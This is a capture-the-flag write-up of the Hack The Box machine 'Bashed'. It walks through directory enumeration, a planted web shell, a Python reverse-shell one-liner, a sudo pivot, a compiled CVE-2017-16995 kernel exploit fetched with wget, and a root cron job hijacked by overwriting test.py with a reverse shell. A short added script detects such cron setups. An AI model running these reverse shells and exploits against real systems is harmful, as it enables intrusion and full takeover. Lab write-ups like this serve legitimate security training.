
Bashed

Machine: Bashed (HTB)
Difficulty: Easy
OS: Linux

Walkthrough

Let's start with an nmap scan. It shows a single open port, 80/tcp, serving Apache 2.4.18 on Ubuntu.


PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Let's continue with gobuster to enumerate directories and common file extensions.

┌──(root💀kali)-[~/htb/Linux/Bashed]
└─# gobuster dir --add-slash --expanded --extensions php,txt,html,js --follow-redirect --url http://10.10.10.68/ --no-error -t 50 --wordlist /usr/share/wordlists/dirb/big.txt | tee gobuster1
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.68/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,js,php,txt
[+] Add Slash:               true
[+] Follow Redirect:         true
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2021/08/02 18:47:18 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.10.68/.htaccess.php        (Status: 403) [Size: 299]
http://10.10.10.68/.htaccess.txt        (Status: 403) [Size: 299]
http://10.10.10.68/.htaccess.html       (Status: 403) [Size: 300]
http://10.10.10.68/.htaccess.js         (Status: 403) [Size: 298]
http://10.10.10.68/.htaccess/           (Status: 403) [Size: 296]
http://10.10.10.68/.htpasswd.php        (Status: 403) [Size: 299]
http://10.10.10.68/.htpasswd.txt        (Status: 403) [Size: 299]
http://10.10.10.68/.htpasswd.html       (Status: 403) [Size: 300]
http://10.10.10.68/.htpasswd.js         (Status: 403) [Size: 298]
http://10.10.10.68/.htpasswd/           (Status: 403) [Size: 296]
http://10.10.10.68/about.html           (Status: 200) [Size: 8193]
http://10.10.10.68/config.php           (Status: 200) [Size: 0]   
http://10.10.10.68/contact.html         (Status: 200) [Size: 7805]
http://10.10.10.68/css/                 (Status: 200) [Size: 1758]
http://10.10.10.68/dev/                 (Status: 200) [Size: 1148]
http://10.10.10.68/fonts/               (Status: 200) [Size: 2095]
http://10.10.10.68/icons/               (Status: 403) [Size: 292] 
http://10.10.10.68/images/              (Status: 200) [Size: 1564]
http://10.10.10.68/index.html           (Status: 200) [Size: 7743]
http://10.10.10.68/js/                  (Status: 200) [Size: 3165]
http://10.10.10.68/php/                 (Status: 200) [Size: 939] 
http://10.10.10.68/scroll.html          (Status: 200) [Size: 10863]
http://10.10.10.68/server-status/       (Status: 403) [Size: 300]  
http://10.10.10.68/single.html          (Status: 200) [Size: 7477] 
http://10.10.10.68/uploads/             (Status: 200) [Size: 14]  

Visiting the site, I saw it was the development site for a GitHub project that provides a web shell (phpbash). So I looked for the web shell on the target itself and found it at http://10.10.10.68/dev/phpbash.php, under the /dev/ directory gobuster listed above. From there, let's get a proper reverse shell with Python: start a listener on Kali and run the one-liner below inside the web shell.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.15",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
┌──(root💀kali)-[~]
└─# nc -lvp 4444
listening on [any] 4444 ...
10.10.10.68: inverse host lookup failed: Unknown host
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.68] 39346
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

First flag, in arrexel's home directory. user.txt is world-readable, so www-data can read it without any escalation:

$ ls -la
total 36
drwxr-xr-x 4 arrexel arrexel 4096 Dec  4  2017 .
drwxr-xr-x 4 root    root    4096 Dec  4  2017 ..
-rw------- 1 arrexel arrexel    1 Dec 23  2017 .bash_history
-rw-r--r-- 1 arrexel arrexel  220 Dec  4  2017 .bash_logout
-rw-r--r-- 1 arrexel arrexel 3786 Dec  4  2017 .bashrc
drwx------ 2 arrexel arrexel 4096 Dec  4  2017 .cache
drwxrwxr-x 2 arrexel arrexel 4096 Dec  4  2017 .nano
-rw-r--r-- 1 arrexel arrexel  655 Dec  4  2017 .profile
-rw-r--r-- 1 arrexel arrexel    0 Dec  4  2017 .sudo_as_admin_successful
-r--r--r-- 1 arrexel arrexel   33 Dec  4  2017 user.txt
$ cat user.txt  
2c281f318555dbc1b856957c7147bfc1

Now let's escalate privileges. sudo -l shows that www-data may run any command as scriptmanager without a password:

www-data@bashed:/tmp$ sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
www-data@bashed:/tmp$ 

www-data@bashed:/tmp$ sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/tmp$ id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)

While looking at how to become root, I first got root with a kernel exploit, but even after that I believed there was another route, because during enumeration I had found the results below. I suspected the Python script there had not been left behind by accident.

scriptmanager@bashed:/$ find / -writable -type f -exec ls -al {} \; 2>/dev/null
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec  4  2017 /scripts/test.py
-rw-r--r-- 1 scriptmanager scriptmanager 655 Dec  4  2017 /home/scriptmanager/.profile
-rw-r--r-- 1 scriptmanager scriptmanager 3786 Dec  4  2017 /home/scriptmanager/.bashrc
-rw------- 1 scriptmanager scriptmanager 2 Dec  4  2017 /home/scriptmanager/.bash_history
-rw-r--r-- 1 scriptmanager scriptmanager 220 Dec  4  2017 /home/scriptmanager/.bash_logout
--w--w--w- 1 root root 0 Aug  2 16:03 /sys/fs/cgroup/memory/cgroup.event_control
-rw-rw-rw- 1 root root 0 Aug  2 15:43 /sys/kernel/security/apparmor/policy/.remove

...

I ran lse.sh, which I use on Linux machines, then kernelpop, and got root with the exploit below.


scriptmanager@bashed:/tmp/kernelpop-master$ python kernelpop.py

##########################                                                                                                                                   
#  welcome to kernelpop  #                                                                                                                                   
#                        #                                                                                                                                   
# let's pop some kernels #                                                                                                                                   
##########################                                                                                                                                   

[*] grabbing distro version and release from underlying OS (linuxubuntu16)
[*] grabbing kernel version from 'uname -a'
[!] could only get the kernel base...may not have accurate matches
[+] kernel (Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux) identified as:
[base]
        type:                   linux
        distro:                 linuxubuntu16
        version:                4.4.0-62
        architecture:           x86_64
[!] no specific distro kernel discovered...likelihood of false positives is high
[*] matching kernel to known exploits
[+] discovered 9 possible exploits !
        [[ base linux kernel vulnerable ]]
                CVE20177308     `packet_set_ring` in net/packet/af_packet.c can gain privileges via crafted system calls.
                CVE20160728     `join_session_keyring` function can be abused to get root NOTE: (takes about 30 minutes)
                CVE20162384     Double free vulnerability in the `snd_usbmidi_create` (requires physical proximity)
                CVE20165195_64  Dirty COW race condition root priv esc for 64 bit
                CVE20165195_64_poke     Dirty COW race condition root priv esc for 64 bit (poke variant)
                CVE20173630     Stack clash vuln in solaris
                CVE20176074     `dccp_rcv_state_process` in net/dccp/input.c mishandles structs and can lead to local root
                CVE201716996    eBPF Verifier check_alu_op() Sign Extension Local Root Exploit
                CVE20171000112  ip_ufo_append_data() memory corruption flaw can be exploited to gain root privileges.

There was no gcc on the target, so I compiled on my Kali box and went through the candidates in order; the CVE201716996 exploit succeeded. Two things worth noting about that label: kernelpop's own identifier differs from the one in the exploit source it writes out, whose header builds `cve-2017-16995.c`, the eBPF verifier sign-extension bug (CVE-2017-16995). More importantly, despite kernelpop's false-positive warning, that header lists 4.4.0-62-generic, the exact kernel uname reported on the target, among the tested kernels, which is what made it the obvious first candidate.


┌──(root💀kali)-[~/tool/kernelpop]
└─# python3 kernelpop.py -e CVE201716996 -d             

##########################                                                                                                                                   
#  welcome to kernelpop  #                                                                                                                                   
#                        #                                                                                                                                   
# let's pop some kernels #                                                                                                                                   
##########################                                                                                                                                   

[*] attempting to locate exploit CVE201716996
        [+] exploit found!
        [*] writing the exploit source to disk (/tmp/CVE201716996.c)
[+] successfully written to disk

┌──(root💀kali)-[~/tool/kernelpop]
└─# head /tmp/CVE201716996.c -n 50

/*
  Credit @bleidl, this is a slight modification to his original POC
  https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c

  For details on how the exploit works, please visit
  https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html

  Tested on Ubuntu 16.04 with the following Kernels
  4.4.0-31-generic
  4.4.0-62-generic
  4.4.0-81-generic
  4.4.0-116-generic
  4.8.0-58-generic
  4.10.0.42-generic
  4.13.0-21-generic

  Tested on Fedora 27
  4.13.9-300
  gcc cve-2017-16995.c -o cve-2017-16995
  internet@client:~/cve-2017-16995$ ./cve-2017-16995
  [.]
  [.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
  [.]
  [.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
  [.]
  [*] creating bpf map
  [*] sneaking evil bpf past the verifier
  [*] creating socketpair()
  [*] attaching bpf backdoor to socket
  [*] skbuff => ffff880038c3f500  
  [*] Leaking sock struct from ffff88003af5e180
  [*] Sock->sk_rcvtimeo at offset 472
  [*] Cred structure at ffff880038704600
  [*] UID from cred structure: 1000, matches the current: 1000
  [*] hammering cred structure at ffff880038704600
  [*] credentials patched, launching shell...
  #id
  uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1000(internet)

*/

#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/bpf.h>

┌──(root💀kali)-[~/tool/kernelpop]
└─# gcc /tmp/CVE201716996.c -o /root/htb/Linux/Bashed/CVE201716996  

After compiling the exploit, I transferred it to the target over HTTP and ran it:


scriptmanager@bashed:/tmp$ id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)
scriptmanager@bashed:/tmp$ wget http://10.10.14.15/CVE201716996
--2021-08-02 16:43:32--  http://10.10.14.15/CVE201716996
Connecting to 10.10.14.15:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22272 (22K) [application/octet-stream]
Saving to: 'CVE201716996'

CVE201716996        100%[===================>]  21.75K  --.-KB/s    in 0.08s   

2021-08-02 16:43:32 (287 KB/s) - 'CVE201716996' saved [22272/22272]

scriptmanager@bashed:/tmp$ chmod 777 CVE201716996
scriptmanager@bashed:/tmp$ ./CVE201716996
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff8800366cbf00
[*] Leaking sock struct from ffff88003677c400
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88000003d380
[*] UID from cred structure: 1001, matches the current: 1001
[*] hammering cred structure at ffff88000003d380
[*] credentials patched, launching shell...
# id
uid=0(root) gid=0(root) groups=0(root),1001(scriptmanager)
# cd /root
# ls
root.txt
# cat root.txt
cc4f0afe3a1026d402ba10329674a8e2

Yes! Now for the second route. I noticed that the test.py I had found was being executed at regular intervals: reading it, it creates test.txt and writes to it. Now compare the two ls listings below, taken a minute apart: test.txt is owned by root and its modification time advances each time, while test.py and the /scripts directory itself are owned and writable by scriptmanager. That strongly suggests a root cron job is running a script we control.


scriptmanager@bashed:/scripts$ ls -al
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Aug  2 16:51 test.txt
scriptmanager@bashed:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
scriptmanager@bashed:/scripts$ ls -al
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Aug  2 16:52 test.txt
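The two listings above (and the earlier `find / -writable` output) are the whole clue: a script the low-privilege user can modify sits next to an output file that root keeps rewriting. The following Python is an added example for this writeup, not code from the original page or from the Bashed machine; it turns that manual comparison into a check that can be run over any pair of `ls -al` snapshots. The listings embedded in it are the page's own, reproduced as constructed sample input; the script-suffix list and the user/group names passed in are assumptions for the example.

```python
"""Cron-hijack triage over two `ls -al` snapshots of a directory.

Added example, not part of the original writeup. Flags files the given
user can replace (directly, or by unlinking them in a writable directory)
while a different user keeps rewriting a sibling output file between the
two snapshots: the fingerprint of a privileged cron job running a
user-controlled script.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# One `ls -al` row: mode, link count, owner, group, size, month, day,
# time-or-year, name. "total N" lines and echoed commands do not match.
LS_ROW = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+(?P<month>[A-Za-z]{3})\s+(?P<day>\d{1,2})\s+(?P<stamp>\S+)\s+(?P<name>.+)$"
)

SCRIPT_SUFFIXES = (".py", ".sh", ".pl")  # assumption: what counts as a script here


@dataclass(frozen=True)
class Entry:
    mode: str
    owner: str
    group: str
    mtime: str  # "Mon D HH:MM" or "Mon D YYYY", normalised from what ls printed
    name: str

    def is_dir(self) -> bool:
        return self.mode[0] == "d"

    def writable_by(self, user: str, groups: Set[str]) -> bool:
        """Unix semantics: owner bits if we own it, else group bits, else other."""
        if self.owner == user:
            return self.mode[2] == "w"
        if self.group in groups:
            return self.mode[5] == "w"
        return self.mode[8] == "w"


def parse_ls(listing: str) -> Dict[str, Entry]:
    entries: Dict[str, Entry] = {}
    for line in listing.splitlines():
        m = LS_ROW.match(line.strip())
        if m is None:
            continue
        stamp = f"{m['month']} {int(m['day'])} {m['stamp']}"
        entries[m["name"]] = Entry(m["mode"], m["owner"], m["group"], stamp, m["name"])
    return entries


def cron_hijack_candidates(before: str, after: str, user: str,
                           groups: Set[str]) -> List[Tuple[str, str, str]]:
    """(script, output, output_owner) triples worth a closer look."""
    b, a = parse_ls(before), parse_ls(after)
    # A writable parent directory lets us replace the script even if the
    # file itself is read-only for us (unlink + recreate).
    dir_writable = "." in a and a["."].writable_by(user, groups)
    scripts = [e for e in a.values()
               if not e.is_dir() and e.name.endswith(SCRIPT_SUFFIXES)
               and (e.writable_by(user, groups) or dir_writable)]
    rewritten = [e for e in a.values()
                 if not e.is_dir() and e.owner != user
                 and e.name in b and b[e.name].mtime != e.mtime]
    return [(s.name, o.name, o.owner) for s in scripts for o in rewritten]


# The page's two /scripts listings, one minute apart (constructed sample input).
SNAPSHOT_1651 = """\
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Aug  2 16:51 test.txt
"""
SNAPSHOT_1652 = SNAPSHOT_1651.replace("16:51", "16:52")

if __name__ == "__main__":
    hits = cron_hijack_candidates(SNAPSHOT_1651, SNAPSHOT_1652,
                                  "scriptmanager", {"scriptmanager"})
    for script, output, owner in hits:
        print(f"{script} is writable by us but {output} is rewritten by {owner}: "
              f"likely a {owner} cron job executing {script}")
```

Run as www-data instead of scriptmanager the same snapshots yield nothing, because neither test.py nor the directory is writable by that user; that is exactly why the `sudo -u scriptmanager` hop above matters before this route opens up.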

So I wrote a Python reverse shell on my Kali box, named it test.py, and copied it into /scripts over HTTP, overwriting the original, and started a new listener on port 1822:


scriptmanager@bashed:/scripts$ wget http://10.10.14.15/test.py
--2021-08-02 16:56:32--  http://10.10.14.15/test.py
Connecting to 10.10.14.15:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 258 [text/x-python]
Saving to: 'test.py'

test.py             100%[===================>]     258  --.-KB/s    in 0s      

2021-08-02 16:56:32 (34.6 MB/s) - 'test.py' saved [258/258]

scriptmanager@bashed:/scripts$ cat test.py
import os

os.system("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.15\",1822));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'")

┌──(root💀kali)-[~]
└─# nc -lvp 1822
listening on [any] 1822 ...
10.10.10.68: inverse host lookup failed: Unknown host
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.68] 48108
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# 
Category: Walkthrough
